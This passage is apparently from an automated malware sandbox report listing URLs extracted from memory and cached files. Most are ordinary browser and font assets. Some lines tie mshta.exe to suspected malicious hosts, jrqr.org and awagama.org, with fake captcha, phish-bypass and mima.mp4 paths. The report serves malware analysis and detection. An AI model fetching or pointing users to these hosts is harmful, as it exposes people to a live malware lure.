    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
    Source: 000003.log6.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
    Source: chromecache_634.1.dr, chromecache_651.1.drString found in binary or memory: https://eu.asas.yango.com/mapuid
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
    Source: chromecache_535.1.dr, chromecache_381.1.drString found in binary or memory: https://f.vimeocdn.com/js/froogaloop2.min.js
    Source: chromecache_429.1.drString found in binary or memory: https://fontawesome.com
    Source: chromecache_429.1.drString found in binary or memory: https://fontawesome.com/license
    Source: chromecache_644.1.drString found in binary or memory: https://fonts.googleapis.com
    Source: chromecache_644.1.drString found in binary or memory: https://fonts.googleapis.com/css2?display=swap&family=Raleway:wght
    Source: chromecache_429.1.drString found in binary or memory: https://fonts.googleapis.com/css?family=Open
    Source: chromecache_429.1.drString found in binary or memory: https://fonts.googleapis.com/css?family=Oswald:400
    Source: chromecache_429.1.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
    Source: chromecache_644.1.drString found in binary or memory: https://fonts.gstatic.com
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/dancingscript/v25/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8ltA.wo
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/dancingscript/v25/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8ltA.wo
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/dancingscript/v25/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Sup8.woff2
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/dosis/v32/HhyJU5sn9vOmLxNkIwRSjTVNWLEJBbMl1BMEfq4.woff2)
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/dosis/v32/HhyJU5sn9vOmLxNkIwRSjTVNWLEJBbMl1RMEfq4.woff2)
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/dosis/v32/HhyJU5sn9vOmLxNkIwRSjTVNWLEJBbMl2xME.woff2)
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/fjallaone/v15/Yq6R-LCAWCX3-6Ky7FAFrO56kigt.woff2)
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/fjallaone/v15/Yq6R-LCAWCX3-6Ky7FAFrO96kigt.woff2)
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/fjallaone/v15/Yq6R-LCAWCX3-6Ky7FAFrOF6kg.woff2)
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/fjallaone/v15/Yq6R-LCAWCX3-6Ky7FAFrOx6kigt.woff2)
    Source: chromecache_437.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2)
    Source: chromecache_437.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS2mu1aB.woff2)
    Source: chromecache_437.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSCmu1aB.woff2)
    Source: chromecache_437.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSGmu1aB.woff2)
    Source: chromecache_437.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2)
    Source: chromecache_437.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2)
    Source: chromecache_437.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2)
    Source: chromecache_437.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSymu1aB.woff2)
    Source: chromecache_437.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTUGmu1aB.woff2)
    Source: chromecache_437.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTVOmu1aB.woff2)
    Source: chromecache_610.1.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlSHYjedg.wo
    Source: chromecache_610.1.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlWHYg.woff2
    Source: chromecache_610.1.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlYHYjedg.wo
    Source: chromecache_610.1.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlZHYjedg.wo
    Source: chromecache_610.1.drString found in binary or memory: https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlbHYjedg.wo
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/raleway/v34/1Ptug8zYS_SKggPNyC0ITw.woff2)
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/raleway/v34/1Ptug8zYS_SKggPNyCAIT5lu.woff2)
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/raleway/v34/1Ptug8zYS_SKggPNyCIIT5lu.woff2)
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/raleway/v34/1Ptug8zYS_SKggPNyCMIT5lu.woff2)
    Source: chromecache_558.1.drString found in binary or memory: https://fonts.gstatic.com/s/raleway/v34/1Ptug8zYS_SKggPNyCkIT5lu.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu72xKOzY.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)
    Source: chromecache_641.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)
    Source: chromecache_644.1.drString found in binary or memory: https://forms.pienissimo.com/?hash=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&id=Fl7E3J
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://gaana.com/
    Source: chromecache_429.1.drString found in binary or memory: https://getbootstrap.com/)
    Source: chromecache_449.1.dr, chromecache_504.1.drString found in binary or memory: https://github.com/AviaThemes/wp-themes/issues/812
    Source: chromecache_495.1.drString found in binary or memory: https://github.com/KriesiMedia/wp-themes/issues/1171
    Source: chromecache_582.1.dr, chromecache_577.1.drString found in binary or memory: https://github.com/imakewebthings/waypoints/blog/master/licenses.txt
    Source: chromecache_582.1.dr, chromecache_577.1.drString found in binary or memory: https://github.com/ryanburnette/scrollToBySpeed/blob/master/src/scrolltobyspeed.jquery.js
    Source: chromecache_429.1.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
    Source: chromecache_598.1.dr, chromecache_530.1.drString found in binary or memory: https://isotope.metafizzy.co
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F6599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://m.kugou.com/
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://m.soundcloud.com/
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://m.vk.com/
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
    Source: chromecache_428.1.drString found in binary or memory: https://mc.kinopoisk.ru/sync_cookie_image_check
    Source: chromecache_634.1.dr, chromecache_651.1.drString found in binary or memory: https://mc.yandex.
    Source: chromecache_634.1.dr, chromecache_651.1.drString found in binary or memory: https://mc.yandex.md/cc
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://music.amazon.com
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://music.apple.com
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://music.yandex.com
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://open.spotify.com
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://outlook.live.com/mail/0/
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://outlook.office.com/mail/0/
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
    Source: chromecache_426.1.drString found in binary or memory: https://plus.google.com
    Source: chromecache_426.1.drString found in binary or memory: https://plus.googleapis.com
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
    Source: chromecache_505.1.dr, chromecache_519.1.drString found in binary or memory: https://privacy-pienissimo.s3.eu-central-1.amazonaws.com/informativa/uzuypfb7d33r7lvcjvw37oharuqxwlg
    Source: chromecache_629.1.drString found in binary or memory: https://pro.pns.sm/shrtkiv
    Source: chromecache_644.1.drString found in binary or memory: https://schema.org
    Source: chromecache_644.1.drString found in binary or memory: https://schema.org/Blog
    Source: chromecache_644.1.drString found in binary or memory: https://schema.org/CreativeWork
    Source: chromecache_644.1.drString found in binary or memory: https://schema.org/ImageObject
    Source: chromecache_644.1.drString found in binary or memory: https://schema.org/SiteNavigationElement
    Source: chromecache_644.1.drString found in binary or memory: https://schema.org/WPHeader
    Source: chromecache_644.1.drString found in binary or memory: https://schema.org/WebPage
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F6599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.jrqr.org/
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F6520000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2415681543.000001A8F8400000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2411657408.000001A0F655F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2411657408.000001A0F6599000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2409685094.0000004F576EF000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2411657408.000001A0F6528000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2413979969.000001A0F6890000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2411657408.000001A0F6545000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2414162617.000001A0F7EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://solve.jrqr.org/awjxs.captcha?u=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: mshta.exe, 0000000C.00000002.2413979969.000001A0F6890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.jrqr.org/awjxs.captcha?u=21187cdf-b91f-4f27-aae8-45cec9395e7c#?
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F655F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.jrqr.org/awjxs.captcha?u=21187cdf-b91f-4f27-aae8-45cec9395e7ce
    Source: chromecache_499.1.drString found in binary or memory: https://stats.g.doubleclick.net/j/collect
    Source: {78AD4D72-C9F0-11EF-8C2E-ECF4BBFF258A}.dat.14.drString found in binary or memory: https://t3.aw
    Source: {78AD4D72-C9F0-11EF-8C2E-ECF4BBFF258A}.dat.14.drString found in binary or memory: https://t3.awagama.orTL1
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F65CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2411657408.000001A0F655F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/images/icon-exclamation.png?1376755637
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/images/icon-exclamation.png?13767556374
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F655F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/images/icon-exclamation.png?1376755637M
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/images/icon-exclamation.png?1376755637O
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F655F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/images/icon-exclamation.png?1376755637gent
    Source: {78AD4D72-C9F0-11EF-8C2E-ECF4BBFF258A}.dat.14.drString found in binary or memory: https://t3.awagama.org/cdn-cgi/ph
    Source: mshta.exe, 0000000C.00000002.2426232029.000001A8FDE88000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2419552191.000001A8F9257000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1696094293.000001A8F925D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1704914389.000001A8F925D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1703404687.000001A8F925D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2425388262.000001A8FD914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1682512039.000001A8F924C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/phish-bypass
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9257000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1696094293.000001A8F925D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1704914389.000001A8F925D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1703404687.000001A8F925D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1682512039.000001A8F924C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/phish-bypass)
    Source: History.21.drString found in binary or memory: https://t3.awagama.org/cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922
    Source: {78AD4D72-C9F0-11EF-8C2E-ECF4BBFF258A}.dat.14.drString found in binary or memory: https://t3.awagama.org/cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0ish-bypass?atok=5Cx
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9257000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1696094293.000001A8F925D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1704914389.000001A8F925D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1703404687.000001A8F925D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1682512039.000001A8F924C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/phish-bypassO
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9257000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1696094293.000001A8F925D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1704914389.000001A8F925D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1703404687.000001A8F925D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1682512039.000001A8F924C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/phish-bypassc
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/styles/cf
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/styles/cf.errors.css
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/styles/cf.errors.css5_
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F655F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/styles/cf.errors.cssWy
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/cdn-cgi/styles/cf.errors.cssX
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1686376029.000001A8F921E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2411657408.000001A0F6599000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2419552191.000001A8F921E000.00000004.00000020.00020000.00000000.sdmp, {78AD4D72-C9F0-11EF-8C2E-ECF4BBFF258A}.dat.14.drString found in binary or memory: https://t3.awagama.org/mima.mp4
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/mima.mp4Fhttps://www.cloudflare.com/learning/access-management/phishing-attac
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/mima.mp4GRF
    Source: mshta.exe, 0000000C.00000002.2416065388.000001A8F8428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/mima.mp4Hi
    Source: mshta.exe, 0000000C.00000003.2359318810.000001A8FD904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/mima.mp4e
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/mima.mp4eRd
    Source: mshta.exe, 0000000C.00000002.2422172079.000001A8F9375000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/mima.mp4https://t3.awagama.org/mima.mp40:
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/mima.mp4ing/access-management/phishing-attack/
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/mima.mp4rn
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F655F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/mima.mp4tcha?u=21187cdf-b91f-4f27-aae8-45cec9395e7c
    Source: mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/mima.mp4tyles/cf.errors.css
    Source: mshta.exe, 0000000C.00000002.2411657408.000001A0F655F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t3.awagama.org/mima.mp4tyles/cf.errors.css-4f27-aae8-45cec9395e7c
    Source: chromecache_605.1.dr, chromecache_499.1.drString found in binary or memory: https://tagassistant.google.com/
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://tidal.com/
    Source: chromecache_644.1.drString found in binary or memory: https://tinyurl.com/yytbmzzL
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://twitter.com/
    Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.21.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
    Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.21.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
    Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.21.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
    Source: chromecache_396.1.dr, chromecache_432.1.drString found in binary or memory: https://unpkg.com/ngx-bootstrap/datepicker/bs-datepicker.css
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://vibe.naver.com/today
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://web.telegram.org/
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://web.whatsapp.com
    Source: chromecache_484.1.drString found in binary or memory: https://webaim.org/techniques/css/invisiblecontent/#techniques
    Source: 0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
    Source: chromecache_426.1.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/#/schema/logo/image/
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/#organization
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/#website
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/?lang=en
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/?s=
    Source: chromecache_644.1.drString found in binary or memory: https://www.cipassoitalia.it/cipasso/
